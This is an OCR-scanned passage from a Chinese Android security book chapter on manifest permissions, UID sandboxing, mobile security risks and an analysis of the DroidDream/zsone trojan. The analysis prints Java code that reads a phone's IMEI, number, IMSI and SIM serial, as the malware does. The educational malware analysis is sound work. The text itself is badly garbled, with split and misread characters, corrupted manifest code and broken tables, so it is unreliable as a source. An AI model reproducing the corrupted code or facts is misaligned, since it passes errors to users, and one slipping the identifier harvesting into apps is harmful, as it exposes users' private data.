93504 29132 ffffffff afdéc51c S com.android.launcher 

86660 21392 ffffffff afd6éc51c S com.android.settings 
92676 20296 ffffffff afdOc51c S android.process.acore 
84312 21356 ffffffff afdpc5lc S com.android.deskclock 
82964 20200 ffffffff afdoc5lc S com.android.protips 

83520 20444 ffffffff afdéc5ic S com.android.music 

84008 21192 ffffffff afdōc5ic S com.android.quicksearchbox 
86484 22428 ffffffff cfdoc5lc S android.process.media 


com. android.email 
/system/bin/sh 
com.mj. iCalendar 
ps 


85972 22896 ffffffff afdéc5lc 
732 344  c003da38 afdéc3ac 
85304 23728 ffffffff aofdéc51c 
888 324 | 00000000 afd6b45c 


S 
S 
S 
5 
95604 21728 ffffffff afdoc51c 5 com.android.mms 
5 
5 
ES 
R 








图 4.3 使 用 “ps” 命 令 显示 进程 所 属 关系 


com. mj. iCalender 进程 所 属 的 用 户 是 app_36， 其 UID 为 36。 该 用 户 名 及 其 UID 
是 iCalender 应 用 程序 在 安装 时 ， 由 安装 进程 分 配 的 。 此 外 ， 还 有 很 多 的 进程 属于 
root 或 System RP, 也 就 是 超级 用 户 或 系统 用 户 。root 用 户 管 理 后 台 进 程 如 init 
进程 等 ;system 用 户 管理 服务 管理 器 进程 。 这 些 特殊 的 进程 用 于 提供 和 管理 各 种 
Android 功能 ， 因 此 ， 这 些 进程 不 能 被 普通 用 户 访 问 和 控制 。 

在 Manifest 文件 中 ， 应 用 程序 可 以 使 用 “android:shareUserId” 属 性 请 求 同 其 
他 应 用 程序 共享 UID， 如 果 应 用 程序 同 被 共享 UID. 的 应 用 程序 使 用 相同 的 证 书签 
名 ， 则 Android 系统 允许 该 请 求 。Manifest 文件 中 共享 同一 个 UID 的 代码 如 下 : 

«manifest xmlns:android-"http://schemas.android.com/apk/ 


res/android" 
package-"com.example.android.foo" 









































n 


«/manifest» 


4.3 Android Manifest 权限 


Linux 内 核 通 过 将 不 同 的 应 用 程序 沙 箱 化 ， 阻 止 它们 互相 访问 各 自 的 数据 或 用 
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户 信息 ， 阻 止 对 诸如 访问 互联 网 、 拨 打 电 话 、 
接受 短信 等 敏感 操作 的 执行 。 如 果 应 用 程序 需 





要 执行 上 述 敏感 操作 〈 如 访问 互联 网 ) ， 读 取 








用 户 信息 (如 联系 人 信息 )， 或 同 其 他 应 用 程 
序 通 信 (如 同 电 子 邮 件 应 用 通信 )， 则 需 在 
MAC 模型 下 请 求 这 些 权限 ， 即 应 用 程序 在 其 配 
置 文件 (BI Manifest 文件 ) 中 声明 所 需 权 限 。 
当 应 用 程序 安装 时 ，Android 系统 会 向 用 户 列 
出 其 所 需 的 权限 ,， 供 用户 同意 或 拒绝 ， 如 图 
4.4 所 示 。 用 户 不 能 有 选择 地 (部 分 地 ) 接受 
应 用 程序 所 需 的 权限 ， 也 就 是 说 ， 用 户 不 能 选 
择 只 接受 应 用 程序 访问 互联 网 的 权限 请 求 ， 而 
拒绝 访问 短信 息 的 权限 。 对 于 应 用 程序 请 求 的 
一 组 权限 ， 用 户 要 人 么 全 部 接受 , 要 么 全 部 拒 
绝 。 一 旦 用 户 接受 这 些 权限 ，Android 系统 将 
通过 Linux 内 核 允许 应 用 程序 执行 请 求 的 操作 ， 
或 同 其 他 应 用 程序 或 组 件 进 行 交互 。 需 要 注意 
的 是 ， 一 旦 用 户 批准 应 用 程序 所 需 的 权限 ， 就 
不 能 再 次 撤销 它们 ， 唯 一 办 法 只 有 钊 载 该 应 用 









































Do you want to install this application 
Allow tNIS application to: 
Your messages 
Network communication 
Storage 
Phone calls 


Services that cost you money 


Hide [v] 


@ System tools 


Install 


图 4.4 应 用 程序 安装 时 权限 请 求 


程序 。 这 是 因为 Android 系统 不 能 在 运行 时 赋予 权限 ， 因 为 这 样 会 导致 应 用 程序 的 


用 户 友好 程度 体验 降低 。 


如 图 4. 5 所 示 ， 当 从 官方 Android 应 用 市 场 下 载 应 用 程序 时 ， 官方 的 Android 
应 用 市 场 软件 会 将 该 应 用 程序 所 需 的 权限 显示 给 用 户 。 但 不 是 所 有 的 Android 应 用 
市 场 都 如 此 ， 毕 竟 现 在 有 相当 多 的 Android 应 用 程序 下 载 来 源 。 如 果 用 户 只 是 下 载 
了 .apk 安 闭 文件， 那么 只 能 在 该 文件 安装 时 ， 用 户 才 能 看 到 系统 显示 的 安装 该 软 

















件 可 能 存在 的 安全 问题 的 警告 。 
4.3.1 权限 请 求 
































在 默认 情况 下 ，Android 应 用 程序 不 能 执行 任何 操作 ， 这 显然 会 影响 到 应 用 程 
序 的 用 户 体验 ， 以 及 对 设备 上 的 数据 访问 ， 所 以 Android 应 用 程序 需要 “ 显 式 ”地 
请 求 这 些 受 保护 的 Android Bi 性。 这 些 特性 在 Android Manifest 文件 中 请 求 ， 相 对 于 
之 前 讨论 的 Linux 权限 ， 通 常 将 这 些 请 求 称 为 Manifest 权限 。 请 求 的 权限 需要 在 
Manifest 文件 内 部 的 < uses- piles > 标签 下 声明 。 下 面 是 一 个 应 用 程序 请 求 访问 


互联 网 和 读 取 MMS (Multimedia Messaging Service, 
也 称 为 彩信 ) 5 SMS (Short Messaging Service, 


信 ) 权限 的 例子 : 





























多 媒体 短信 服务 ) 信息 (通常 





短信 服务 ) 信息 (通常 也 称 为 短 
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«manifest xmlns:android-"http://schemas. android.com/apk/ 
res/android" 


package-"com.android.app.foobar" » 


«uses-permission android:name-"android.permission. 
INTERNET" /» 


«uses-permission android:name-"android.permission. 
READ SMS" /» 


«uses-permission android:name-"android.permission. 
READ MMS” /> 


«/manifest» 


Permissions 


THIS APPLICATION HAS ACCESS TO THE FOLLOWING: 


INSTALL 


YOUR ACCOUNTS 

MANAGE THE ACCOUNTS LIST 

Allows an application to perform operations like adding, and removing accounts and deleting their password. 
USE THE AUTHENTICATION CREDENTIALS OF AN ACCOUNT 





Google Ma; 
1 ddi aia T> Allows an application to request authentication tokens. 
E EDrmroRs' CHOICE YOUTUBE 
É Free Allows applications to sign in to YouTube using the account(s) stored on this phone. 
YOUTUBE USERNAMES 
Gmail Allows applications to see the YouTube usemame(s) associated with the Google account(s) stored on this phone. 


GOOGLE NC 多 


~v S k S0 035731) NETWORK COMMUNICATION 


"tee FULL INTERNET ACCESS 
Google Translate Allows an application to create network sockets. 
E GOOGLE INC. 9 
fe e e e (119,079) PHONE CALLS 
Free READ PHONE STATE AND IDENTITY 
Allows the application to access the phone features of the device. An application with this permission can determine 
Voice Search 


oos £ MN: 6 the phone number and serial number of this phone, whether a call is active, the number that call is connected to and 
3OOGLE I 


电 the like. 


* c e (46,168) 


Free 
STORAGE A 
: : MODIFY/DELETE USB STORAGE CONTENTS MODIFY/DELETE SD CARD CONTENTS 

u Wh also Allows an application to write to the USB storage. Allows an application to write to the SD card. 

YouTube Remote 

GOOGLE NC. È SYSTEM TOOLS 

TENTAREI CHANGE NETWORK CONNECTIVITY 

Free Allows an application to change the state of network connectivity. 

并 WiFi for YouTube PREVENT DEVICE FROM SLEEPING 

You. CURRY CAT Allows an application to prevent the device from going to sleep. 


图 4.5 Android 应 用 市 场 显示 的 YouTube 应 用 程序 所 需 的 权限 列表 


如 果 应 用 程序 试图 执行 没有 权限 的 操作 ， 如 读 取 SMS 信息 ，Android 系统 会 执 
回 一 个 SecurityException (安全 异常 ) 给 该 应 用 程序 。Android 定义 了 大 量 的 默认 权 
HR (BI Manifest 权限 ) ， 涉 及 大 量 的 应 用 程序 功能 ， 如 读 取 SMS 信息 、 发 送 MMS 
言 息 、 访 问 互联 网 和 挂 载 文件 系统 等 。 而 且 ， 应 用 程序 还 可 以 自 定义 权限 。 例 如 ， 
应 用 程序 通过 Activity 或 其 他 组 件 提 供 自 己 的 功能 给 其 他 应 用 程序 使 用 ， 或 应 用 程 
序 想 要 执行 自己 定义 的 权限 ， 二 他 应 用 程序 知道 。 

如 果 应 用 程序 想 要 控制 指定 的 其 他 应 用 程序 (或 它们 的 组 件 ) 启动 /访问 自己 
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的 Activity， 可 在 Manifest 文件 中 使 用 如 下 的 权限 类 型 实现 : 


«manifest xmlns:android-"http://schemas.android.com/apk/ 


res/android" 
package-"com.android.app.foobar" » 
«permission android:name-"com.android.app.foobar. 
permission.EXP FEATURE” 
android:label-"8string/permlab EXP FEATURE" 


android:description-"G8string/permdesc EXP FEATURE" 
android:permissionGroup-"android.permission-group. 


COST MONEY" 
android:protectionlevel-"dangerous"/» 


«/manifest» 





上 述 代 码 段 中 ，android: name 属性 为 新 建 的 自 定义 权限 的 名 称 ， 应 用 程序 可 


以 在 Manifest 文件 的 < uses- permission > 标签 中 使 用 此 权限 。android: label 





属性 为 


权限 的 短 名 称 ， 显 示 给 用 户 。android: description 属性 用 于 描述 权限 的 详细 信息 。 
例如 ， 当 权限 的 android: label 属性 为 “EXPENSIVE FEATURE" Hj, android: 

















description 属 性 可 以 这 样 描述 该 权限 : “该 权限 允许 应 用 程序 发 送 付 费 SMS 


信息 和 


接收 MMS 信息 ， 这 会 增加 你 的 支出 ， 因 为 这 将 计 费 到 你 的 通话 时 间 ”。android: 
protectionLevel 属性 定义 了 用 户 批 准 该 权限 可 能 承担 的 风险 级 别 。 在 防护 类 别 中 共 








有 四 个 风险 等 级 ， 见 表 4. 1。 


表 4.1 Android 用 户 防 护 等 级 















































































































































防护 级 别 说 明 
普通 级 默认 的 权限 值 ， 允 许 应 用 程序 访问 那些 不 会 对 其 他 应 用 程序 、 用 户 或 系统 产生 太 大 风 
iss 险 的 特性 。 由 系统 自动 赋予 ， 不 过 用 户 仍然 可 以 在 应 用 程序 安装 时 查看 到 这 类 权限 
危险 级 允许 应 用 程序 执行 某 些 操 作 ， 这 些 操 作 可 能 会 让 用 户 支付 一 定 的 费用 或 获取 用 户 的 资 
ERZ 

料 ， 对 用 户 造 成 一 定 的 负面 影响 。 这 类 权限 是 需要 用 户 明确 批准 的 权限 

签名 级 只 授予 同 权 限 声明 程序 使 用 相同 证 书签 名 的 应 用 程序 

签名 /系统 级 2 Android 系统 应 用 程序 ， 或 与 Android 系统 应 用 程序 使 用 相同 证 书签 名 的 应 





执行 “adb shell pm list permissions-g" 命令 能 够 获得 一 张 所 有 权限 的 列表 ， 表 


中 权限 以 分 组 的 形式 组 织 ， 如 图 4.6 所 示 。 


如 图 4.7 所 示 ， 执 行 “adb shell pm list permissions-f” 命令 ， 可 以 获得 系统 定 


义 的 所 有 权限 的 详细 信息 。 





如 图 4.8 所 示 ， 执行“adb shell pm list permissions-s” 命令 ， 可 以 显示 相连 设 











备 上 的 所 有 可 用 权限 。 


58 Android 系统 安全 与 攻防 





pentestusrietools-gibbons-vm-2:-$ adb shell pm list permissions -g 
All Permissions: 


group:android.permission-group.DEVELOPMENT. TOOLS 
permission;android.permission.SIGNAL.PERSISTENT. PROCESSES 
permission:android.permission.SET.ALWAYS, FINISH 
permission:android.permission.SET DEBUG. APP 
permission:android.permission.SET PROCESS LIMIT 


group: android.permission-group.PERSONAL.. INFO 
permission:android.permission.READ, USER. DICTIONARY 
permission:android.permission.WRITE CONTACTS 
permission: com.android.browser.permission,WRITE HISTORY BOOKMARKS 
permission:android.permission.BIND, APPWIDGET 
permission:com.android.browser.permission.READ. HISTORY BOOKMARKS 
permission:com.ondroid.alarm.permission.SET ALARM 
permission:android.permission.READ. LOGS 
permission:android.permission.READ, CONTACTS 
permission:android.permission.READ. CALENDAR 
permission:android.permission.WRITE CALENDAR 
permission:android.permission.DUMP 
permission:android.permission.WRITE USER. DICTIONARY 


jgroup: android.permission-group.COST. MONEY 
permission:android.permission.SEND SMS 
permission:android.permission.CALL..PHONE 


group :;android.permission-group.LOCATION 
permission:android.permission.ACCESS, MOCK. LOCATION 
permission:android.permission.ACCESS LOCATION, EXTRA, COMMANDS 
permission:android.permission.ACCESS,. COARSE LOCATION 
permission:android.permission.ACCESS. FINE, LOCATION 


group : android, permi ssion-group MESSAGES 
permission:android.permission.BROADCAST. SMS 
permission:android.permission.BROADCAST, WAP. PUSH 
permission:android.permission.WRITE. SMS 
permission:android.permission.READ. SMS 
permission:com.android.emoil.permission.READ ATTACHMENT 
permission:android.permission.RECEIVE.SMS 
permission:android.permission.RECEIVE. WAP. PUSH 
permission:android.permission.RECEIVE,MMS 





图 4.6 Android 系统 权限 (分 组 显示 ) 


4.3.2 权限 组 合 使 用 


总 的 来 说 ，Linux 内 核 将 所 有 的 应 用 程序 沙 箱 化 ， 并 通过 执行 UID 或 GID 权限 
机 制 提 供 系统 安全 性 。 同 时 ，Android 应 用 程序 还 需要 额外 的 权限 ， 只 有 用 户 批准 
后 ,才能 在 Android 系统 上 安装 。 所 有 的 应 用 程序 ， 无 论 是 Java 程序 、 本 地 代码 程 
序 还 是 Java 和 本 地 代码 混杂 程序 ， 在 Android 系统 上 都 通过 同样 方式 沙 箱 化 。 
对 于 一 些 底层 权限 ，Android 系统 需要 将 相应 的 权限 字符 串 映射 到 能 够 访问 对 应 
功能 的 群 组 。 例 如 当 应 用 程序 申请 android. permission. INTERNET 权限 请 求 访问 互 
联网 时 ， 用 户 批 准 后 ，Android 系统 将 该 应 用 程序 加 入 到 inet 群 组 。 成 为 inet 群 组 成 
员 后 ， 应 用 程序 才 有 互联 网 访问 权限 。 这 些 映 射 关系 定义 在 /system/etc/platform- 
xml/ 目 录 下 的 platform. xml 文件 内 。 高 级 别 的 权限 由 Android 系统 在 运行 时 进行 约束 。 
对 于 Android 应 用 程序 来 说， 请 求 的 权限 必然 要 比 需要 用 户 授权 的 权限 多 。 

/ system/etc/platform- xml 文件 定义 了 底层 系统 用 户 ID 与 群 组 ID 同 特定 的 权限 
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em 


IN. INTERNAL M_WINDOW 


inauthon Windows 


lows tne creation of 





图 4.7 执行 “adb shell pm list permissions-f" 命令 输出 显示 


pentestusriétools-gibbons-vm-2:-$ adb shell pm list permissions -s 
ALl Permissions: 


Development tools: send Linux signals to applications, make all background applications close, enable application debugging, limit number of running prd 


Your personal information: read user defined dictionary, write contact data, write Browser's history and bookmarks, choose widgets, read Browser's histd 
bookmarks, set alarm in alarm clock, read sensitive log data, read contact data, read calendor events, add or modify calendar events and send email to 
retrieve system internal state, write to user defined dictionary 


Services that cost you money: send SMS messages, directly call phone numbers 
Your location: mock location sources for testing, access extra location provider commands, coarse (network-based) location, fine (GPS) location 


Your messages: send SMS-received broadcast, send WAP-PUSH-received broadcast, edit SMS or MMS, read SMS or MMS, Read Email attachments, receive SMS, re 
P, receive MMS 


Network communication: view network state, create Bluetooth connections, view Wi-Fi state, full Internet access, download files without notification, 
ive Internet calls, control Near Field Comunication 


Your accounts: act as an account authenticator, manage the accounts list, discover known accounts, use the authentication credentials of an account, a 
AccountManagerServi ce 


Storage: modify/delete SD card contents 
IPhone calls: read phone state and identity, modify phone state, intercept outgoing calis 
Hardware controls: control flashlight, test hardware, take pictures and vide ecord audio, change your audio settings, access USB devices, control v' 


System tools: allow Wi-Fi Multicast reception, delete all application cache data, get information on internal storage, set preferred applications, moke 
tion always run, change background data usage setting, uninstall shortcuts, force stop other applications, kill background processes, [1] Killed 

pm list permissi.. 
|pentestusrietools-gibbons-vm-2:^$ | 





图 4.8 执行 “adb shell pm list permissions-s" 命令 输出 显示 


之 间 的 映射 关系 ， 如 图 4. 9 所 示 。 
例如 ， 应 用 程序 “Foobar” 需要 访问 互联 网 ， 并 且 能 够 读 取 SMS 和 MMS fri 
此 ， 该 应 用 程序 所 需 权 限 的 声明 如 图 4. 10 所 示 。 


«uses-permission android:name-"android.permission.INTERNET" /> 
«uses-permission android:name-"android.permission.READ SMS" /» 
«uses-permission android:name-"android.permission.READ . MMS” /> 
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«permissi 


<le- 


ons> 


The following tags are associating low-level group IDs with 
permission names. By specifying such a mapping, you are saying 
that any application process granted the given permission will 
also be running with the given group ID attached to its process, 


so it can perform any filesystem (read, write, execute) 
allowed for that group. --» 


<permissior name="android. permission. BLUETOOTH ADMIN" > 
«group gide"net bt admin" /> 
«/permission» 


«permission names"android.penrmission.BLUETOOTH" > 
«group gide"net bt" /» 
«/permission» 


«permission name="android, permission. INTERNET" > 
«group gid="inet" /» 
«/permission» 





operations 


图 4.9 android: permission. INTERNET 权限 同 GID inet 的 映射 关系 


I/package» 


«package name-"com.mj.iCalendar" codePath-"/data/app/com.mj.iCalendar-i.apk" nativelibraryPathe"/data/data/com.mj.iCalendar/lib" flags="0" 


ute"132adfdfa58" versions"2" userId-"10036"» 
" 


key="308202153082017e000302010202044d259ebc300d06092a864886f70d0101050500304e310b3009060355040613023836310b30090603550408. 
04071302434e310b3009060355040013024d40310b3009060355040b13024d403100300906035504031302444a302017043131303130363130353134305a180f 323131303; 
04e310b3009060355040613023836310b3009060355040813025348310b300906035504071302434e310b3009060355040a13024d4a310b3009060355040b13024d4a310b; 
30819f300d06092a864886f70d010101050003818d0030818902818100991e665610b37aaafdda7174dc42deðc9326c7c6c2be3b7b76d9dbfd75ce8adaa5c45felb2ala5d: 
074a14d1e85f003efc128c2608fb7c2381693a7d7f6b9086a91f53b3e8f27a047df06721d37556771c85c738ce65c5571c513eac6d7f490d6dð7 fa3eføb27db1ðe84d6fðd: 
010001300406092a864886f70d0101050500038181007 1bf29e93a8cca279cd03222ef39326980086a54c8aac785fc7e36e72c4d776f68e64a217b07be3adec6febf38dfc4 


<item name-"android.permission.READ. PHONE STATE" /> 
«item name-"android.permission.SET WALLPAPER" /» 

«item names"android.permission.SEND. SMS" /> 

<item name-"android.permission,.WRITE.EXTERNAL. STORAGE" /> 
«item names"android.permission.INTERNET" /> 

<item name="android.permission.RECEIVE_SMS* /> 

<item names"android.permission.ACCESS COARSE LOCATION" /> 
<item name-"android.permission.RESTART, PACKAGES" /> 
</perms> 

</package> 


图 4. 10. ”应 用 程序 Foobar 所 需 权 限 














应 用 程序 Foobar 安装 时 ， 系 统 会 询问 用 户 是 否 批准 该 程序 使 用 上 述 请 求 权 限 。 用 


户 批 准 后 ，Android 系统 在 platform. xml 文件 中 查找 “android: 








permission. INTERNET" 











权限 字符 串 对 应 的 GID。 由 于 应 用 程序 必须 加 入 inet GID 才能 扫 


有 有 互联 网 的 访问 权限 ， 





找到 该 权限 对 应 的 GID 后 ， 即 将 该 应 用 程序 进程 加 入 inet GID, 





从 而 实现 对 互联 网 的 访 


问 。 对 于 android. permission. READ_SMS 和 android. permission. READ_MMS 这 类 高 级 别 的 





权限 ， 则 由 Android 权限 管理 需 来 判定 该 应 用 程序 是 否 有 权 执 和 


了 相应 的 操作 。 


在 设备 上 ， TE MUN GENE MM MEC E 


开发 人 员 编 写 创建 Android apk 文件 时 。 对 于 已 经 安装 在 系统 
如 果 要 想 查 看 程序 的 权限 ， 只 能 通过 查阅 设备 系统 上 /data/s 















































上 的 应 用 程序 来 说 ， 
ystem 目录 下 的 packa- 
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ges. xml 文件 ， 如 图 4. 11 所 示 。 


05050030 


nm.READ_PHONE_STATE”/> 


.INTERNET" /» 





图 4.11 已 安装 应 用 程序 的 所 需 权 限 


需要 系统 执行 权限 验证 的 情景 有 : 

e 应 用 程序 执行 时 。 

e 应 用 程序 执行 没有 授权 的 功能 时 。 

e 应 用 程序 启动 没有 授权 的 Activity 时 。 

e 应 用 程序 发 送 或 接收 广播 Intent 时 。 

@ 访问 或 更 新 Content Provider (内 容 提供 器 ) 时 。 
e 应 用 程序 创建 服务 时 。 














4.4 移动 设备 安全 问题 





同 其 他 移动 操作 系统 一 样 ，Android 系统 也 会 遭受 各 种 传统 安全 问题 的 威胁 。 
下 面 讨论 的 这 些 问题 对 于 所 有 的 移动 平台 都 是 很 常见 的 ， 并 不 局 限于 Android 系 
统 。 其 中 一 些 问题 也 会 出 现在 传统 设备 上 ， 如 笔记 本 电脑 ， 而 其 他 的 一 些 问题 则 仅 
针对 于 移动 设备 。 


4.4.1 设备 




















很 多 人 丢 过 手机 。 在 智能 手机 出 现 之 前 ， 这 意味 着 将 失去 其 他 人 的 联系 信息 。 
但 在 智能 手机 (如 Android FHL) 大 量 普 及 的 今天 ， 对 于 大 部 分 人 来 说 这 将 导致 丢 
掉 更 多 的 信息 ， 如 : 

e 移动 设备 上 存储 的 电子 邮件 。 

@ 自动 登录 Facebook, Twitter, Youtube, Flickr 等 社交 网 站 。 

e 银行 账号 信息 。 

e 位 置 和 GPS 记录 。 

e 个 人 健康 资料 。 
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如 果 移 动 设备 没有 加 密 ， 设 备 丢 失 还 可 能 导致 资料 信息 泄露 的 风险 。 比 如 ,将 
手机 连接 在 电脑 上 ， 可 以 通过 很 多 工具 ( 如 各 种 取证 软件 ) 提取 手机 上 面 的 数据 。 


4.4.2 漏洞 修补 


本 书 编写 时 ，Android 系统 最 新 的 发 布 版 本 是 3.2。 然 而 ， 目 前 大 多 数 设备 仍 
然 运 行 着 Android 1. 5 ~2. 3 之 间 的 各 种 版 本 ， 其 中 2.2 和 2.3 版 本 是 现存 最 主流 的 
Android 系统 版 本 。 而 且 ， 这 些 设备 的 Android 系统 更 新 或 改进 都 是 由 各 自 厂商 完 
成 的 ， 因 此 ， 很 难 及 时 地 对 操作 系统 的 漏洞 进行 持续 地 修补 。 相 对 于 这 一 点 ， 在 本 
书 编写 时 ， 现 存 的 iPhone 系统 只 有 108 3 和 i0S 4 两 个 版 本 。 


4.4.3 外 部 存储 


使 用 可 持 拔 的 外 部 存储 会 增加 数据 安全 风险 ， 遗失 SD 卡 要 比 遗 失手 机 更 容 
易 。 大 多 数 情况 下 ，SD 卡 上 的 数据 都 是 未 经 加 密 的 ， 非 常 容 易 被 人 从 中 获取 用 户 
资料 。 而 且 ，SD 卡通 常 在 多 个 设备 上 频繁 地 搬 拔 使 用 ， 更 增加 了 遭遇 恶意 软件 被 
抽取 数据 的 风险 。 再 者 ， 可 插 拔 存储 设备 十 分 脆弱 、 容 易 造 成 数据 丢失 和 损坏 。 


44.4 键盘 


屏幕 软 键盘 是 一 个 非常 流行 的 功能 特性 ， 但 从 安全 专家 的 角度 来 看 ， 软 键盘 存 
在 着 非常 大 的 安全 隐患 。 尤 其 在 火车 上 或 咖啡 厅 使 用 软 键盘 输入 敏感 信息 ， 会 给 
“ 肩 宕 2” 者 提供 非常 便利 的 机 会 窥探 他 人 隐私 。 这 种 情况 在 平板 电脑 上 更 为 严重 ， 
因为 平板 电脑 能 够 显示 完整 的 键盘 ， 输 入 的 字符 信息 会 以 短暂 几 秒 的 明文 形式 反馈 
给 用 户 ， 很 容易 被 他 人 帘 视 。 甚 至 ,输入 字符 后 在 屏幕 上 留 下 的 指纹 痕迹 也 会 帮助 
攻击 者 窃取 信息 。 
4.4.5 数据 隐私 

Google 地 图 是 Android 设备 上 最 流行 的 应 用 程序 之 一 ， 许 多 其 他 应 用 程序 能 够 
与 Google 地 图 交互 ， 使 用 Google 提供 的 用 户 位 置信 息 。 然 后 ， 将 这 些 信息 存储 到 
自己 的 缓存 中 。 继 而 ， 基 于 这 些 位 置信 息 向 用 户 显 示 广 告 或 提供 最 近 的 咖啡 厅 快 
照 。 但 是 ， 这 种 机 制 的 安全 底线 是 ， 只 有 具有 特定 权限 的 应 用 程序 才能 获取 这 些 位 
置信 息 。 一 段 时 间 后 ， 通 过 运行 在 后 台 的 GPS 跟踪 右 获 取 的 这 些 数据 就 能 揭示 出 
有 关 用 户 习 惯 的 敏感 信息 。 
4446 应 用 程序 安全 


相对 于 传统 的 、 完 备 的 IT (Information Technology， 信 息 技术 ) 应 用 程序 ， 移 




































































O 肩 宕 ， 指 的 是 越过 肩膀 探 看 别人 操作 获取 信息 的 做 法 。 一 一 译 考 注 
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动 应 用 程序 更 容易 受到 攻击 。 由 于 移动 设备 的 数据 特点 ， 传 统 的 攻击 方式 ， 如 SQL 
ŒA (SQL Inject, SQLi) 、 跨 站 点 伪造 请 求 〈Cross- Site Request Forgery，XSRF ) ， 
跨 站 点 脚本 ( Cross-Site Scripting, XSS) 等 攻击 不 仅 会 在 移动 平台 和 应 用 程序 上 出 
现 ， 其 至 还 可 能 衍生 出 更 加 严重 的 攻击 。 移 动 设备 上 弱化 的 SSL (Secure Sockets 
Layer， 安 全 套 接 层 ) 功能 或 加 密 缺 失 等 问题 ， 很 可 能 导致 移动 应 用 程序 面临 各 种 
诸如 网 络 钓鱼 、 绕 过 身份 认证 ， 以 及 会 话 固定 等 攻击 方式 的 威胁 。 
4.4.7 遗留 代码 

GSM 或 CDMA 制式 通信 的 大 部 分 底层 代码 多 年 来 都 没有 做 过 改动 ， 这 些 设备 
驱动 代码 基本 没有 考虑 安全 措施 ,很 容易 受到 老式 攻击 方式 的 威胁 (例如 ， 栈 洲 


出 攻击 等 )。 而 且 ， 如 今 的 新 设备 仍然 依赖 于 这 些 传统 的 底层 代码 。 事 实 上 ， 很 多 
新 的 代码 都 是 在 这 些 遗 留 代码 的 基础 上 增加 的 。 因 此 ， 存 在 一 定 的 安全 隐患 。 





4.5 近期 主要 的 Android 系统 攻击 事件 


2011 年 3 月 第 一 周 ， 一 款 名 为 “DroidDream” 的 恶意 软件 袭击 了 Android 系统 
平台 。 与 i0S 系统 相 比 ，Android 系统 更 加 开放 。 因 此 ，Android 系统 上 的 应 用 市 场 
政策 也 相对 宽松 。Google 没有 对 应 用 市 场 上 的 软件 进行 严格 的 审查 管理 ， 甚 至 ， 也 
不 会 像 草 果 公司 那样 对 Android 软件 的 发 布 渠道 进行 限制 。Android 应 用 软件 可 以 
通过 各 种 渠道 获得 ， 如 : 

€ H7; Android 应 用 市 场 ， 即 Google 公司 自 有 的 应 用 程序 市 场 。 

€ 二 级 Android 应 用 市 场 ， 如 亚马逊 等 。 

e 区 域 化 的 Android 应 用 市 场 和 应 用 程序 商店 ， 如 中 国 、 韩 国 等 国内 的 应 用 源 。 

e 直接 向 用 户 提供 apk 文件 下 载 的 网 站 。 

类 似 于 其 他 的 恶意 软件 ， 例 如 Geinimi, HongTouTou 等 ，DroidDream 隐藏 或 混 
入 到 貌似 合法 的 应 用 程序 中 。 由 于 一 般 用 户 都 会 信任 从 Android 应 用 市 场 下 载 的 应 
用 ， 结 果 使 自己 的 设备 遭受 该 恶意 软件 的 感染 。 

该 恶意 软件 事件 爆发 后 ，Google 公司 采用 一 种 不 寻常 的 措施 ， 即 启用 远程 删除 
功能 ， 将 被 感染 设备 上 的 恶意 软件 删 掉 。 据 统计 ， 在 这 些 受 感染 的 设备 上 有 将 近 
50 款 应 用 程序 被 视 为 恶意 软件 。DroidDream 及 其 变种 能 够 获得 敏感 的 用 户 信息 和 
设备 信息 ， 甚 至 获取 root 权限 。 如 果 读 者 想 要 查看 此 次 恶意 软件 事件 中 全 部 恶意 应 
用 程序 的 名 单 ， 请 使 用 Google 搜索 “MYOURNET” 关 键 字 查询 。 


4.5.1 DroidDream 变种 程序 分 析 


本 节 通 过 分 析 这 款 恶 意 程序 ， 以 确定 这 款 恶意 程序 使 用 的 权限 和 潜在 的 影响 。 
通过 将 该 恶意 程序 安装 在 模拟 器 上 ， 查 看 其 请 求 的 权限 ， 如 图 4. 12 所 示 。 
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恶意 软件 信息 : zsone GMatch，iCalendar 等 ) 





ARZI: AA 破坏 性 AAA 发 布 * 
概述 感染 信息 如何 删 除 
名 称 zsone (iMatch, iCelendar and others ) 
恶意 软件 类 型 Trojan 
地 区 位 置 All around 
评分 5 
发 现 日 期 11.05.2011 
收录 日 期 11.05.2011 | 


这 款 恶意 软件 能 够 不 经 过 用 户 允 许 ， 即 可 发 送 SMS 短 信息 。 它 有 几 个 变种 ， 每 个 变种 程序 都 有 自己 的 名 称 ， 如 
iMateh、iCalendar 等 。 该 软件 被 安装 后 ， 会 等 待 一 段 时 间 ， 然 后 不 经 过 用 户 自行 订阅 付费 服务 。 通 过 后 台 服 务 
发 送 SMS 短 信息 ， 自 动 避 开 用 户 注意 ， 使 用 户 为 这 些 付费 业务 、SMS 短 信息 支付 费用 。 


该 应 用 程序 已 经 被 Google 从 Android 应 用 市 场 上 删除 。 








用 户 可 以 使 用 AVG 移 动 版 杀毒 软件 检测 并 删除 这 类 恶意 软件 。 


图 4.12 ”恶意 软件 DroidDream 请 求 的 权限 从 





从 下 面 的 代码 段 可 以 看 到 ,该 恶意 程序 共 请 求 了 三 种 权限 READ. PHONE 
STATE, SET WALLPAPER 和 INTERNET, 


«perms» 
«item name-"android.permission.READ PHONE STATE" /» 


«item name-"android.permission.SET WALLPAPER" /» 
«item name-"android.permission.INTERNET" /» 


</perms> 


从 请 求 的 这 些 权限 上 来 看 ， 该 应 用 程序 似乎 是 一 个 壁纸 程序 。 然 而 ， 该 应 
用 程序 还 想 要 访问 手机 状态 。 2220 2. iABRCTOR 


LY. 


FS : 


e IMEI O (也 称 设备 ID) , 
e 电话 号 码 。 
@ SIM 卡 序列 号 。 


e 用 户 识别 码 (IMSI) 。 


下 述 代码 段 能 够 使 应 用 程序 获得 敏感 的 电话 信息 : 





© 
© 





通过 模拟 器 上 的 /data/system/packages. xml 文件 ， 查 看 DroidDream 应 用 请 求 的 权限 信息 。 一 一 原 书 注 
IMEI (International Mobile Equipment Identity ， 国 际 移动 设备 识别 码 ) 是 一 个 15 ~17 位 数字 组 成 的 
子 串 号 ， 用 于 唯一 标识 网 络 上 的 移动 设备 。 通 过 该 串 号 ， 移 动 运营 商 能 够 终止 被 偷 或 丢失 的 设备 使 
用 服务 。 一 一 原 书 注 
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TelephonyManager telephonyManager -(TelephonyManager) 
getSystemService(Context.TELEPHONY SERVICE); 


String IMEI NUM = telephonyManager.getDeviceId(); 
String Phone NUM = telephonyManager.getLinelNumber(); 
String IMSI NUM - telephonyManager.getSubscriberId(); 
String SIM NUM = telephonyManager.getSimSerialNumber(); 


CARTII EXREE HUE, WAE er SOL ACOS SERI A 08. LT 
以 Android 系统 能 够 允许 该 恶意 程序 这 样 做 ， 还 取决 于 该 恶意 程序 获得 了 男 一 个 重要 的 
